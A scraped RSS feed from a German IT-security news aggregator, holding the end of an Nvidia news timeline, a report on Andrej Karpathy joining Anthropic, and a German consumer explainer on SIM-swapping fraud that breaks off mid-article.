

<p><em>March 19, 2025:</em> <a href="https://www.networkworld.com/article/3848304/hpe-nvidia-broaden-ai-infrastructure-lineup.html">HPE news from Nvidia GTC</a> includes a new Private Cloud AI developer kit, Nvidia AI blueprints, GPU optimization capabilities, and servers built with Nvidia Blackwell Ultra and Blackwell architecture.</p>



<h3 class="wp-block-heading">Cisco, Nvidia team to deliver secure AI factory infrastructure</h3>



<p><em>March 18, 2025: </em>Cisco and Nvidia have expanded their partnership to create their most advanced AI architecture package to date, designed to promote <a href="https://www.networkworld.com/article/3848286/cisco-nvidia-team-to-deliver-secure-ai-factory-infrastructure.html">secure enterprise AI networking</a>.</p>



<h3 class="wp-block-heading">Nvidia’s ‘hard pivot’ to AI reasoning bolsters Llama models for agentic AI</h3>



<p><em>March 18, 2025: </em>The company has <a href="https://www.cio.com/article/3848261/nvidias-hard-pivot-to-ai-reasoning-bolsters-llama-models-for-agentic-ai.html">post-trained its new Llama Nemotron family of reasoning models</a> to improve multistep math, coding, reasoning, and complex decision-making. The enhancements aim to provide developers and enterprises with a business-ready foundation for creating AI agents that can work independently or as part of connected teams.</p>



<h3 class="wp-block-heading">Nvidia details its GPU, CPU, and system roadmap for the next three years</h3>



<p><em>March 18, 2025: </em>Nvidia CEO Jensen Huang shared <a href="https://www.networkworld.com/article/3848394/nvidia-details-its-gpu-cpu-and-system-roadmap-for-the-next-three-years.html">previously unreleased specifications</a> for its Rubin graphics processing unit (GPU), due in 2026, the Rubin Ultra coming in 2027, and announced the addition of a new GPU called Feynman to the mix for 2028.</p>



<h3 class="wp-block-heading">Oracle, Nvidia partner to add AI software into OCI services</h3>



<p><em>March 18, 2025: </em>Nvidia’s AI Enterprise stack will be <a href="https://www.infoworld.com/article/3847900/oracle-nvidia-partner-to-add-ai-software-into-oci-services.html">available natively through the OCI Console</a> and will be available anywhere in OCI’s distributed cloud while providing enterprises access to over 160 AI tools for training and inference, including NIM microservices, the companies said in a joint statement at Nvidia’s annual GTC conference.</p>



<h3 class="wp-block-heading">Nvidia GTC 2025: What to expect from the AI leader</h3>



<p><em>March 3, 2025</em>: Last year, Nvidia’s GTC 2024 grabbed headlines with the introduction of the Blackwell architecture and the DGX systems powered by it. With<a href="https://www.networkworld.com/article/3833841/nvidia-gtc-2025-what-to-expect-from-the-ai-leader.html"> Nvidia GTC 2025</a> right around the corner, the tech world is eager to see what Nvidia – and its partners and competitors – will unveil next. </p>



<h3 class="wp-block-heading">Cisco, Nvidia expand AI partnership to include Silicon One technology</h3>



<p><em>February 25, 2025</em>; <a href="https://www.networkworld.com/article/3832700/cisco-nvidia-expand-ai-partnership-to-include-silicon-one-technology.html">Cisco and Nvidia have expanded their collaboration</a> to support enterprise AI implementations by tying Cisco’s Silicon One technology to Nvidia’s Ethernet networking platform. The extended agreement is designed to offer customers yet another way to support AI workloads across the data center and strengthens both companies’ strategies to expand the role of Ethernet networking for AI in the enterprise.</p>



<h3 class="wp-block-heading">Nvidia forges healthcare partnerships to advance AI-driven genomics, drug discovery </h3>



<p><em>February 14, 2025</em>: Through new partnerships with industry leaders, Nvidia aims to advance practical use cases for <a href="https://www.networkworld.com/article/3825263/nvidia-forges-healthcare-partnerships-to-advance-ai-driven-genomics-drug-discovery-and-more.html">AI in healthcare </a>and life sciences. It’s a logical move: Healthcare has the most significant upside, particularly in patient care, among all the industries applicable to AI. </p>



<h3 class="wp-block-heading">Nvidia partners with cybersecurity vendors for real-time monitoring</h3>



<p><em>February 12, 2025</em>: <a href="https://www.networkworld.com/article/3823145/nvidia-partners-with-cybersecurity-vendors-for-real-time-monitoring.html">Nvidia partnered with leading cybersecurity firms</a> to provide real-time security protection using its accelerator and networking hardware in combination with its AI software. Under the agreement, Nvidia will provide integration of its BlueField and Morpheus hardware with cyber defenses software from Armis, Check Point Software Technologies, CrowdStrike, Deloitte and World Wide Technology .</p>



<h3 class="wp-block-heading">Nvidia claims near 50% boost in AI storage speed</h3>



<p><em>February 7, 2025:</em> <a href="https://www.networkworld.com/article/3817927/nvidia-claims-near-50-boost-in-ai-storage-speed.html">Nvidia is touting a near 50% improvement</a> in storage read bandwidth thanks to intelligence in its Spectrum-X Ethernet networking equipment, according to the vendor’s technical blog post. Spectrum-X is a combination of the company’s Spectrum-4 Ethernet switch and BlueField-3 SuperNIC smart networking card, which supports RoCE v2 for remote direct memory access (RDMA) over Converged Ethernet.</p>



<h3 class="wp-block-heading">Nvidia unveils preview of DeepSeek-R1 NIM microservice</h3>



<p><em>February 3, 2025</em>: The chipmaker stock plummeted 17% after Chinese AI developer DeepSeek unveiled its DeepSeek-R1 LLM. Last week, <a href="https://www.cio.com/article/3814582/nvidia-unveils-preview-of-deepseek-r1-nim-microservice.html">Nvidia  announced the DeepSeek-R1 model </a>is now available as a preview Nvidia inference microservice (NIM) on build.nvidia.com. </p>



<h3 class="wp-block-heading">Nvidia unveils preview of DeepSeek-R1 NIM microservice</h3>



<p><em>January 31, 2025: </em>Nvidia stock plummeted 17% after Chinese AI developer, DeepSeek, unveiled its DeepSeek-R1 LLM. Later the same week, the chipmaker turned around and announced the DeepSeek-R1 model is <a href="https://www.cio.com/article/3814582/nvidia-unveils-preview-of-deepseek-r1-nim-microservice.html">available as a preview Nvidia inference microservice</a> (NIM) on build.nvidia.com.</p>



<h3 class="wp-block-heading">Nvidia intros new guardrail microservices for agentic AI</h3>



<p><em>January 16, 2025</em>: Nvidia added new Nvidia inference microservices (NIMs) for <a href="https://www.cio.com/article/3803583/nvidia-intros-new-guardrail-microservices-for-agentic-ai.html">AI guardrails to its Nvidia NeMo Guardrails</a> software tools. The new microservices aim to help enterprises improve accuracy, security, and control of agentic AI applications, addressing a key reservation IT leaders have about adopting the technology.</p>



<h3 class="wp-block-heading">Nvidia year in review</h3>



<p><em>January 10, 202</em>5: Last year was Nvidia’s year. Its command of mindshare and market share was unequaled among tech vendors. Here’s a recap of some of the <a href="https://www.networkworld.com/article/3800823/nvidia-year-in-review.html">key Nvidia events of 2024</a> that highlight just how powerful the world’s most dominant chip player is.</p>



<h3 class="wp-block-heading">Nvidia launches blueprints to help jumpstart AI projects</h3>



<p><em>January 8, 202</em>5: Nvidia recently issued designs for AI factories after hyping up the idea for several months. Now it has come out with <a href="https://www.networkworld.com/article/3635164/nvidia-launches-blueprints-to-help-jump-start-ai-projects.html">AI blueprints</a>, essentially prebuilt templates that give developers a jump start on creating AI systems.</p>



<h3 class="wp-block-heading">Nvidia’s Project DIGITS puts AI supercomputing chips on the desktop</h3>



<p><em>January 6, 2025</em>: <a href="https://www.computerworld.com/article/3632371/nvidias-project-digits-puts-ai-supercomputing-chips-on-the-desktop.html">Nvidia is readying a tiny desktop device called Project DIGITS</a>, a “personal AI supercomputer” with a lightweight version of the Grace Blackwell platform found in its most powerful servers; it’s aimed at data scientists, researchers, and students who will be able to prototype, tune, and run large genAI models.</p>



<h3 class="wp-block-heading">Nvidia unveils generative physical AI platform, agentic AI advances at CES</h3>



<p><em>January 6, 202</em>5: At CES in Las Vegas, <a href="https://www.cio.com/article/3632479/nvidia-unveils-generative-physical-ai-platform-agentic-ai-advances-at-ces.html">Nvidia trumpeted a slew of AI announcements</a>, with an emphasis on generative physical AI that promises a new revolution in factory and warehouse automation. “AI requires us to build an entirely new computing stack to build AI factories, accelerated computing at data center scale,” Rev Lebaredian, vice president of omniverse and simulation technology at Nvidia.</p>



<h3 class="wp-block-heading">Verizon, Nvidia team up for enterprise AI networking</h3>



<p><em>December 30, 2024</em>: <a href="https://www.networkworld.com/article/3630452/verizon-nvidia-team-up-for-enterprise-ai-networking.html">Verizon and Nvidia partnered to build AI services</a> for enterprises that run workloads over Verizon’s 5G private network. The new offering, 5G Private Network with Enterprise AI, will run a range of AI applications and workloads over Verizon’s private 5G network with Mobile Edge Compute (MEC). MEC is a colocated infrastructure that is a part of Verizon’s public wireless network, bringing compute and storage closer to devices and endpoints for ultra-low latency.</p>



<h3 class="wp-block-heading">Nvidia’s Run:ai acquisition waved through by EU</h3>



<p>December 20, 2024: Nvidia will face no objections to its <a href="https://www.networkworld.com/article/3629642/nvidias-runai-acquisition-waved-through-by-eu.html">plan to acquire Israeli AI orchestration software vendor Run:ai Labs</a> in Europe, after the European Commission gave the deal its approval today. But Nvidia may not be out of the woods yet. Competition authorities in other markets are closely examining the company’s acquisition strategy.</p>



<h3 class="wp-block-heading">China launches anti-monopoly probe into Nvidia amid rising US-China chip tensions</h3>



<p><em>December 10, 2024</em>:  China has initiated an <a href="https://www.networkworld.com/article/3620295/china-launches-anti-monopoly-probe-into-nvidia-amid-rising-us-china-chip-tensions.html">investigation into Nvidia</a> over alleged violations of the country’s anti-monopoly laws, signaling a potential escalation in the ongoing tech and trade tensions between Beijing and Washington.</p>



<h3 class="wp-block-heading">Nvidia Blackwell chips face serious heating issues</h3>



<p><em>November 18, 2024</em>: Nvidia’s next-generation Blackwell data center <a href="https://www.networkworld.com/article/3608212/nvidia-blackwell-chips-face-serious-heating-issues.html" data-type="link" data-id="https://www.networkworld.com/article/3608212/nvidia-blackwell-chips-face-serious-heating-issues.html">processors have significant problems with overheating</a> when installed in high-capacity server racks, forcing redesigns of the racks themselves, according to a report by The Information. These issues have reportedly led to design changes, meaning delays in shipping product and raising concern that its biggest customers, including Google, Meta, and Microsoft, will be able to deploy Blackwell servers according to their schedules.</p>



<h3 class="wp-block-heading">Nvidia to power India’s AI factories with tens of thousands of AI chips</h3>



<p><em>October 24, 2024</em>: <a href="https://www.networkworld.com/article/3585322/nvidia-to-power-indias-ai-factories-with-tens-of-thousands-of-ai-chips.html" data-type="link" data-id="https://www.networkworld.com/article/3585322/nvidia-to-power-indias-ai-factories-with-tens-of-thousands-of-ai-chips.html">Nvidia plans to deploy thousands of Hopper GPUs</a> in India to create AI factories and collaborate with Reliance Industries to develop AI infrastructure.. Yotta Data Services, Tata Communications, E2E Networks, and Netweb will lead the AI factories — large-scale data centers for producing AI. Nvidia added that the expansion will provide nearly 180 exaflops of computing power.</p>



<h3 class="wp-block-heading">Nvidia contributes Blackwell rack design to Open Compute Project</h3>



<p><em>October 15, 2024</em>:<a href="https://www.networkworld.com/article/3564745/nvidia-contributes-blackwell-rack-design-to-open-compute-project.html"> Nvidia contributed to the Open Compute Project its Blackwell GB200 NVL72</a> electro-mechanical designs – including the rack architecture, compute and switch tray mechanicals, liquid cooling and thermal environment specifications, and Nvidia NVLink cable cartridge volumetrics –.</p>



<h3 class="wp-block-heading">As global AI energy usage mounts, Nvidia claims efficiency gains of up to 100,000X</h3>



<p><em>October 08, 2024</em>: As concerns over AI energy consumption ratchet up, chip maker <a href="https://www.networkworld.com/article/3550686/as-global-ai-energy-usage-mounts-nvidia-claims-it-has-reduced-its-consumption-by-up-to-110000x.html">Nvidia is defending what it calls a steadfast commitment to sustainability</a>. The company reports that its GPUs have experienced a 2,000X reduction in energy use over the last 10 years in training and a 100,000X energy reduction over that same time in generating tokens.</p>



<h3 class="wp-block-heading">Accenture forms new Nvidia business group focused on agentic AI adoption</h3>



<p><em>October 4, 2024</em>: <a href="https://www.cio.com/article/3543730/accenture-forms-new-nvidia-business-group-focused-on-agentic-ai-adoption.html">Accenture and Nvidia announced an expanded partnership</a> focused on helping customers rapidly scale AI adoption. Accenture said the new group will use Accenture’s AI Refinery platform — built on the Nvidia AI stack, including Nvidia AI Foundry, Nvidia AI Enterprise, and Nvidia Omniverse — to help clients create a foundation for use of agentic AI.</p>



<h3 class="wp-block-heading">IBM expands Nvidia GPU options for cloud customers</h3>



<p><em>October 1, 2024</em>: <a href="https://www.networkworld.com/article/3543463/ibm-expands-nvidia-gpu-options-for-cloud-customers.html">IBM expanded access to Nvidia GPUs on IBM Cloud</a> to help enterprise customers advance their AI implementations, including large language model (LLM) training. IBM Cloud users can now access Nvidia H100 Tensor Core GPU instances in virtual private cloud and managed Red Hat OpenShift environments.</p>



<h3 class="wp-block-heading">Oracle to offer 131,072 Nvidia Blackwell GPUs via its cloud</h3>



<p><em>September 12, 2024</em>: Oracle started taking pre-orders for 131,072 <a href="https://www.networkworld.com/article/3517597/oracle-to-offer-131072-nvidia-blackwell-gpus-via-its-cloud.html">Nvidia Blackwell GPUs</a> in the cloud via its <a href="https://www.networkworld.com/article/971588/oracle-and-nvidia-expand-ai-partnership.html">Oracle Cloud Infrastructure</a> (OCI) Supercluster to aid large language model (LLM) training and other use cases, the company announced at the CloudWorld 2024 conference.  The launch of an offering that provides these many Blackwell GPUs, also known as Grace Blackwell (GB) 200, is significant as enterprises globally are faced with the unavailability of high-bandwidth memory (HBM) — a key component used in making GPUs.</p>



<h3 class="wp-block-heading">Why is the DOJ investigating Nvidia?</h3>



<p><em>September 11, 2024</em>: After a stock sell-off following its quarterly earnings report, Nvidia’s pain was aggravated by news that the <a href="https://www.networkworld.com/article/3516047/why-is-the-doj-investigating-nvidia.html">Department of Justice is escalating its investigation</a> into the company for anticompetitive practices. According to a Bloomberg report, the DOJ sent a subpoena to Nvidia as part of a probe into alleged <a href="https://www.computerworld.com/article/3480912/chance-of-nvidia-losing-antitrust-probe-unlikely-says-analyst.html">antitrust practices</a>.</p>



<h3 class="wp-block-heading">Cisco, HPE, Dell announce support for Nvidia’s pretrained AI workflows</h3>



<p><em>September 4, 2024</em>: <a href="https://www.networkworld.com/article/3504625/cisco-hpe-dell-announce-support-for-nvidias-pretrained-ai-workflows.html">Cisco, HPE, and Dell  are using Nvidia’s new AI microservices</a> blueprints to help enterprises streamline the deployment of generative AI applications. Nvidia’s announced its NIM Agent Blueprints, a catalogue of pretrained, customizable AI workflows that are designed to provide a jump-start for developers creating AI applications. NIM Agent Blueprints target a number of use cases, including customer service, virtual screening for computer-aided drug discovery, and a multimodal PDF data extraction workflow for retrieval-augmented generation (RAG) that can ingest vast quantities of data. </p>



<h3 class="wp-block-heading">Nvidia reportedly trained AI models on YouTube data</h3>



<p><em>August 4, 2024</em>: <a href="https://www.computerworld.com/article/3483812/nvidia-reportedly-trained-ai-models-on-youtube-data.html">Nvidia scraped huge amounts of data from YouTube</a> to train its AI models, even though neither Youtube nor individual YouTube channels approved the move, according to leaked documents. Among other things, Nvidia reportedly used the YouTube data to train its deep learning model Cosmos, an algorithm for automated driving, a human-like AI avatar, and Omniverse, a tool for building 3D worlds.</p>



<h3 class="wp-block-heading">Can Intel’s new chips compete with Nvidia in the AI universe?</h3>



<p><em>June 9, 2024</em>: <a href="https://www.computerworld.com/article/2138358/can-intels-new-chips-compete-with-nvidia-in-the-ai-universe.html">Intel is aiming its next-generation X86 processors at AI tasks</a>, even though the chips won’t actually run AI workloads themselves.mAt Computex, Intel announced its Xeon 6 processor line, talking up what it calls Efficient-cores (E-cores) that it said will deliver up to 4.2 times the performance of Xeon 5 processors. The first Xeon 6 CPU is the Sierra Forest version (6700 series) a more performance-oriented line, Granite Rapids with Performance cores (P-cores or 6900 series), will be released next quarter.</p>



<h3 class="wp-block-heading">Everyone but Nvidia joins forces for new AI interconnect</h3>



<p><em>May 30, 2024</em>: <a href="https://www.networkworld.com/article/2132535/everyone-but-nvidia-joins-forces-for-new-ai-interconnect.html">A clear sign of Nvidia’s dominance</a> is when Intel and AMD link arms to deliver a competing product. That’s what happened when AMD and Intel – along with Broadcom, Cisco, Google, Hewlett Packard Enterprise, Meta and Microsoft – formed the Ultra Accelerator Link (UALink) Promoter Group to develop high-speed interconnections between AI processors.</p>



<h3 class="wp-block-heading">Nvidia to build supercomputer for federal AI research</h3>



<p><em>May 15, 2024</em>: The <a href="https://www.networkworld.com/article/2108329/nvidia-to-build-supercomputer-for-federal-ai-research.html">U.S. government will use an Nvidia DGX SuperPOD</a> to provide researchers and developers access to much more computing power than they have had in the past to produce generative AI advances in areas such as climate science, healthcare and cybersecurity.</p>



<h3 class="wp-block-heading">Nvidia, Google Cloud team to boost AI startups</h3>



<p><em>April 11, 2024</em>: Alphabet’s Google Cloud unveiled a slew of new products and services at Google Cloud Next 2024, among them a program to help startups and small businesses build generative AI applications and services. The initiative brings together the <a href="https://www.networkworld.com/article/2088862/nvidia-and-google-cloud-collaborate-to-accelerate-ai.html">Nvidia Inception program for startups </a>and the Google for Startups Cloud Program.</p>



<h3 class="wp-block-heading">Nvidia GTC 2024 wrap-up: Blackwell not the only big news</h3>



<p><em>March 29, 2024</em>: <a href="https://www.networkworld.com/article/2075562/nvidia-gtc-2024-wrap-up-blackwell-not-the-only-big-news.html">Nvidia’s GDC is in our rearview mirror</a>, and there was plenty of news beyond the major announcement of the Blackwell architecture and the massive new DGX systems powered by it. Here’s a rundown of some of the announcements you might have missed.</p>



<h3 class="wp-block-heading">Nvidia expands partnership with hyperscalers to boost AI training and development</h3>



<p><em>March 19, 2024</em>: <a href="https://www.networkworld.com/article/2067515/nvidia-expands-partnership-with-hyperscalers-to-boost-ai-training-and-development.html">Nvidia extended its existing partnerships with hyperscalers</a> Amazon Web Services (AWS), Google Cloud Platform, Microsoft Azure, and Oracle Cloud Infrastructure, to make available its latest GPUs and foundational large language models and to integrate its software across their platforms.</p>



<h3 class="wp-block-heading">Nvidia launches Blackwell GPU architecture</h3>



<p><em>March 18, 2024</em>: Nvidia kicked off its GTC 2024 conference with the formal <a href="https://www.networkworld.com/article/2066534/nvidia-launches-blackwell-gpu-architecture.html">launch of Blackwell, its next-generation GPU</a> architecture due at the end of the year. Blackwell uses a chiplet design, to a point. Whereas AMD’s designs have several chiplets, Blackwell has two very large dies that are tied together as one GPU with a high-speed interlink that operates at 10 terabytes per second, according to Ian Buck, vice president of HPC at Nvidia.</p>



<h3 class="wp-block-heading">Cisco, Nvidia target secure AI with expanded partnership</h3>



<p><em>February 9, 2024</em>: <a href="https://www.networkworld.com/article/1305971/cisco-nvidia-target-secure-ai-with-expanded-partnership.html">Cisco and Nvidia expanded their partnership</a> to offer integrated software and networking hardware that promises to help customers more easily spin up infrastructure to support AI applications. The agreement deepens both companies’ strategy to expand the role of Ethernet networking for AI workloads in the enterprise. It also gives both companies access to each other’s sales and support systems.</p>



<h3 class="wp-block-heading">Nvidia and Equinix partner for AI data center infrastructure</h3>



<p>J<em>anuary 9, 2024:</em> <a href="https://www.networkworld.com/article/1302075/nvidia-and-equinix-partner-for-ai-data-center-infrastructure.html">Nvidia partnered with data center giant Equinix</a> to offer what the vendors are calling Equinix Private AI with Nvidia DGX, a turnkey solution for companies that are looking to get into the generative AI game but lack the data center infrastructure and expertise to do it.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vom jungen Hacker zum Cybersecurity-Gründer: Ocean erhält 28 Millionen Dollar Finanzierung]]></title>
<description><![CDATA[Obwohl Shay Shwartz in seiner Jugend hackte, beschloss er nach seiner Festnahme mit 16 Jahren, sein Talent nicht für Angriffe, sondern für deren ...]]></description>
<link>https://tsecurity.de/de/3532844/hacking/vom-jungen-hacker-zum-cybersecurity-gruender-ocean-erhaelt-28-millionen-dollar-finanzierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532844/hacking/vom-jungen-hacker-zum-cybersecurity-gruender-ocean-erhaelt-28-millionen-dollar-finanzierung/</guid>
<pubDate>Wed, 20 May 2026 13:50:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Obwohl Shay Shwartz in seiner Jugend hackte, beschloss er nach seiner Festnahme mit 16 Jahren, sein Talent nicht für Angriffe, sondern für deren ...]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI co-founder Andrej Karpathy announces he's joining Anthropic]]></title>
<description><![CDATA[Andrej Karpathy, the influential 39-year-old Slovak-Canadian AI researcher and one of the original 11 co-founders of OpenAI, and former head of Tesla's AI division, announced on Tuesday, May 19 that he's joining rival lab Anthropic.As Karpathy posted from his account on the social network X: "Per...]]></description>
<link>https://tsecurity.de/de/3530358/it-nachrichten/openai-co-founder-andrej-karpathy-announces-hes-joining-anthropic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530358/it-nachrichten/openai-co-founder-andrej-karpathy-announces-hes-joining-anthropic/</guid>
<pubDate>Tue, 19 May 2026 20:04:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Andrej Karpathy, the influential 39-year-old Slovak-Canadian AI researcher and one of the<a href="https://www.reddit.com/r/OpenAI/comments/1m80e9g/the_11_cofounders_of_openai_in_2025/"> original 11 co-founders of OpenAI</a>, and former head of Tesla's AI division, announced on Tuesday, May 19 that he's joining rival lab Anthropic.</p><p>As Karpathy <a href="https://venturebeat.com/technology/andrej-karpathy-announces-hes-joining-anthropic">posted from his account on the social network X</a>: <i>"Personal update: I've joined Anthropic. I think the next few years at the frontier of LLMs will be especially formative. I am very excited to join the team here and get back to R&amp;D. I remain deeply passionate about education and plan to resume my work on it in time."</i></p><p>Anthropic's current Head of Pretraining, Nicholas Joseph, also a former OpenAI alumnus, added more context to Karpathy's new role at Anthropic in <a href="https://x.com/nickevanjoseph/status/2056760504949842219">a post of his own on X,</a> writing: "<i>Excited to welcome Andrej to the Pretraining team! He'll be building a team focused on using Claude to accelerate pretraining research itself. I can’t think of anyone better suited to do it — looking forward to what we build together!"</i></p><p>An Anthropic spokesperson confirmed to VentureBeat via email that Karpathy will be starting a team focused on using Claude, Anthropic's own, increasingly popular AI model, to accelerate pretraining research. This would put Anthropic further toward the overarching AI research goal of many around the world to develop "<a href="https://www.forbes.com/sites/johnsviokla/2026/03/16/the-most-important-idea-in-ai-recursive-self-improvement-rsi/">recursive self-improvement,</a>" that is, AI that is capable of training its successors or upgrading itself with increasingly lesser, or ultimately no human intervention. </p><p>The announcement came on the same day as the start of rival AI-focused tech firm Google's annual I/O developer conference in its headquarters city of Mountain View, California, when many new releases and announcements were expected.</p><h2><b>Karpathy's storied history</b></h2><p>Karpathy is widely known for spanning three parts of the modern AI boom: academic research, big-company deployment and online education. </p><p>His <a href="https://karpathy.ai/">own website</a> describes him as an AI researcher and educator who was a founding member of OpenAI, later served as Director of AI at Tesla, and helped create Stanford’s first deep learning course, CS231n. </p><p>OpenAI’s December 2015 launch announcement also listed Karpathy among the group’s founding members.</p><p>At Tesla, where he worked from 2017 to 2022, Karpathy led the computer vision team for Autopilot and says his team handled in-house data labeling, neural network training and deployment on Tesla’s custom inference chip. </p><p>He then returned to OpenAI from 2023 to 2024, where his website says he built a team focused on midtraining and synthetic data generation — experience directly relevant to Anthropic’s reported pretraining role.</p><p>Karpathy’s academic work began at Stanford, where he earned his PhD under Fei-Fei Li and focused on neural networks for computer vision, natural language processing and the intersection of the two. </p><p>He also interned at Google Brain, Google Research and DeepMind, according to his website. His education includes an MSc from the University of British Columbia and a BSc from the University of Toronto, where he double-majored in computer science and physics.</p><h2><b>What will become of Karpathy's open source research and commitment to AI education?</b></h2><p>Since leaving OpenAI in 2024, Karpathy has become one of AI’s most visible public educators, publishing technical and general-audience videos on large language models and neural networks. </p><p>He also launched Eureka Labs in July 2024 as an “AI-native” school; its first product, <a href="https://x.com/karpathy/status/1813263734707790301">LLM101n</a>, is described as an undergraduate-level course guiding students through training their own AI system.</p><p>Acting on his own as a free agent over the last two years, Karpathy has also helped push open source AI research forward with products and standards including <a href="https://venturebeat.com/technology/andrej-karpathys-new-open-source-autoresearch-lets-you-run-hundreds-of-ai">autoresearch</a>, an LLM-driven automated researcher that can run multiple hypothesis and experiments simultaneously, and the <a href="https://venturebeat.com/data/karpathy-shares-llm-knowledge-base-architecture-that-bypasses-rag-with-an">LLM Knowledge Base</a>, an autonomous system of storing memory and context for AI agents in a kind of ever-growing library designed for them to access. </p><p>The big question is what becomes of these and Karpathy's open source AI efforts more generally as he joins Anthropic, a lab that has supported open source via the launch of its Model Context Protocol (MCP) technical standard, but which also famously has shipped primarily proprietary AI models and harnesses (such as Claude and Claude Code). </p><p>Based on the last statement in his announcement post on X — "<i>I remain deeply passionate about education and plan to resume my work on it in time" </i>— it appears that at least his contributions to the AI-native school effort will be paused as he digs in at Anthropic.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SIM-Swapping: So stehlen Hacker Ihre Handynummer]]></title>
<description><![CDATA[Da praktisch jeder mittlerweile ein Handy oder Smartphone besitzt und ständig mit sich führt, werden mobile Endgeräte verstärkt zur Überprüfung der persönlichen Identität verwendet, insbesondere durch Online-Dienste. Dazu wird ein Einmal-Passcode via SMS oder Voicemail an das Handy des Nutzers du...]]></description>
<link>https://tsecurity.de/de/3529715/it-security-nachrichten/sim-swapping-so-stehlen-hacker-ihre-handynummer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529715/it-security-nachrichten/sim-swapping-so-stehlen-hacker-ihre-handynummer/</guid>
<pubDate>Tue, 19 May 2026 17:39:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Da praktisch jeder mittlerweile ein Handy oder Smartphone besitzt und ständig mit sich führt, werden mobile Endgeräte verstärkt zur Überprüfung der persönlichen Identität verwendet, insbesondere durch Online-Dienste. Dazu wird ein Einmal-Passcode via SMS oder Voicemail an das Handy des Nutzers durchgegeben. Dieser muss den Code dann zur Authentifizierung auf einer Website oder App eingeben, eventuell als Bestandteil einer <a href="https://www.computerwoche.de/article/2780830/zwei-faktor-authentifizierung-sicher-aber-nicht-sicher-genug.html" title="Multi-Faktor-Authentifizierung" target="_blank">Multi-Faktor-Authentifizierung</a> (MFA) oder zur Wiederherstellung eines Accounts.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Handynutzer aufgepasst: Kriminelle machen sich den Trick mit der Ersatz-SIM-Karte zunutze, um auf persönliche Dienste wie Online-Banking zuzugreifen. " title="Handynutzer aufgepasst: Kriminelle machen sich den Trick mit der Ersatz-SIM-Karte zunutze, um auf persönliche Dienste wie Online-Banking zuzugreifen. " src="https://images.computerwoche.de/bdb/3283306/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Handynutzer aufgepasst: Kriminelle machen sich den Trick mit der Ersatz-SIM-Karte zunutze, um auf persönliche Dienste wie Online-Banking zuzugreifen. </p></figcaption></figure><p class="imageCredit">
					Foto: Prostock-studio – shutterstock.com</p></div>




<p>Dabei handelt es sich um eine benutzerfreundliche und vermeintlich sichere Methode. Doch die Tatsache, dass die meisten Nutzer ihre Mobilfunknummern mit Bank-, E-Mail- und Social-Media-Konten verknüpft haben, lockt auch Angreifer auf den Plan. Verschaffen sie sich via SIM-Swapping Zugang zu einer fremden Handy-Nummer, können sie diese für eine Reihe krimineller Zwecke nutzen. So bekommt ein Angreifer alle SMS und Anrufe weitergeleitet oder kann selbst simsen oder – beispielsweise kostenpflichtige Dienste im Ausland – anrufen.</p>



<p>Außerdem ist er in der Lage, (fast) die gesamte Online-Präsenz an sich reißen, indem er Accounts hackt, bei denen eine Mobilfunk-basierte Authentifizierung (z.B. Twitter) oder Wiederherstellung des Passworts möglich ist – dazu gehören beispielsweise auch Gmail, Facebook oder Instagram. <a href="https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html" title="Prominente Opfer" target="_blank" rel="noopener">Prominente Opfer</a> waren unter anderem Twitter-Mitbegründer und Ex-CEO Jack Dorsey oder Schauspielerin Jessica Alba: Ihre Twitter-Accounts wurden via SIM-Swapping gehackt, um im Anschluss anstößige Posts auf der Plattform zu versenden.</p>



<p>Teuer wird es, wenn das Opfer das immer noch (zu) häufig genutzte <a href="https://www.wikibanking.net/onlinebanking/verfahren/mtan/" title="mTAN- oder smsTAN-Verfahren" target="_blank" rel="noopener">mTAN- oder smsTAN-Verfahren</a> zur Freigabe von Online-Überweisungen verwendet, also die Bank die Transaktionsnummer per SMS an den Kunden schickt. Verfügt der Hacker zusätzlich über die Zugangsdaten für das Online-Banking, kann er bequem von zuhause aus das Konto seines Opfers leerräumen. Dass diese Methode nicht nur über dem großen Teich, sondern auch hierzulande genutzt wird, dokumentiert eine Meldung der Zentralstelle Cybercrime Bayern. Diese nahm Mitte 2019 ein Verbrecher-Trio fest, das mittels SIM-Swapping Zugriff auf mindestens 27 fremde Bankkonten <a href="https://www.polizei.bayern.de/unterfranken/news/presse/aktuell/index.html/308409" title="erlangte" target="_blank" rel="noopener">erlangte</a> und Überweisungen vornahm.</p>



<h3 class="wp-block-heading">Wie SIM-Swapping funktioniert</h3>



<p>Die bevorzugte Methode zum Kapern einer Mobilfunknummer ist SIM-Swapping, SIM-Swap oder SIM-Hijacking. SIM-Swapping erfolgt in der Regel über das Kundenportal oder die Kunden-Hotline des Mobilfunk-Providers. Dort gibt sich der Hacker als sein Opfer aus und beantragt eine neue SIM, beispielsweise, weil sein Handy mitsamt der SIM-Karte verlorengegangen ist oder wegen des Formats nicht mehr bei dem neuen Smartphone passt. Oder aber er kündigt den Vertrag und beantragt eine Rufnummernmitnahme/Rufnummerportierung zum neuen Provider.</p>



